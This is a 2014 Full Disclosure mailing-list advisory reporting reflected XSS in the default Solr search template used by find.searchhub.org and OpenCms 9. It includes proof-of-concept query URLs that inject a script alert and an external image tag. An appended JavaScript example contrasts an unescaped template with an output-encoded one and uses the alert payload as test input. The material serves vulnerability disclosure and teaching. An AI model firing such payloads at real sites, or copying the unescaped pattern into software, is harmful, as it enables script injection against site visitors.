[FD] XSS - find.searchhub.org, opencms version9 and others
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] XSS - find.searchhub.org, opencms version9 and others
- From: jkmac@xxxxxxxxxxxxx
- Date: Tue, 20 May 2014 16:23:37 -0400
Hello,
The default search template for solr is prone to XSS, because nobody
validated the input.
PoC:
http://find.searchhub.org/?q=%3Cimg+src%3D%27http%3A%2F%2Fc.s-microsoft.com%2Fnl-nl%2FCMSImages%2Fmslogo.png%3Fversion%3D856673f8-e6be-0476-6669-d5bf2300391d%27%3E
http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E
This is also valid for any opencms website that uses the solr search, e.g. the
default opencms search template based on solr in opencms version 9. E.g. point
your browser to http://localhost:8080/opencms/opencms/demo/search-page/ and
search for
<img src='http://c.s-microsoft.com/nl-nl/CMSImages/mslogo.png?version=856673f8-e6be-0476-6669-d5bf2300391d'>
That might not be a solr issue, but an implementation one.
Regards.
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
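
The missing output encoding described in the post above, shown as an added example that is not part of the original message and is not Solr or OpenCms code. The template functions (`renderUnsafe`, `renderSafe`) and the check `reflectsMarkup` are hypothetical names; the only input taken from the post is its second PoC URL.

```javascript
// Added example: a hypothetical search-results template, not Solr or OpenCms code.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode the five characters that can change HTML structure, both in
// element text and inside a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Read the q parameter as a search page would (percent- and plus-decoding).
function queryFromUrl(url) {
  return new URL(url).searchParams.get('q') ?? '';
}

// Vulnerable pattern: the query is echoed verbatim into the page.
function renderUnsafe(q) {
  return `<form><input name="q" value="${q}"></form><p>Results for: ${q}</p>`;
}

// Hardened pattern: the query is encoded at the point of output,
// in the search box as well as in the results heading.
function renderSafe(q) {
  const encoded = escapeHtml(q);
  return `<form><input name="q" value="${encoded}"></form><p>Results for: ${encoded}</p>`;
}

// Regression check for a template test suite: true when a query that
// contains tag-like markup comes back byte-for-byte in the rendered HTML.
function reflectsMarkup(html, q) {
  return /<[a-z!\/]/i.test(q) && html.includes(q);
}

// Second PoC URL from the post, used here as test input only.
const pocUrl = 'http://find.searchhub.org/?q=%3Cscript%3Ealert%28%27foo%27%29%3C%2Fscript%3E';
const q = queryFromUrl(pocUrl);
console.log('unsafe template reflects markup:', reflectsMarkup(renderUnsafe(q), q));
console.log('safe template reflects markup:  ', reflectsMarkup(renderSafe(q), q));
console.log(renderSafe(q));
```

Encoding at output keeps the user's query visible in the results page exactly as typed, which is why it is preferable here to stripping or rejecting characters at input.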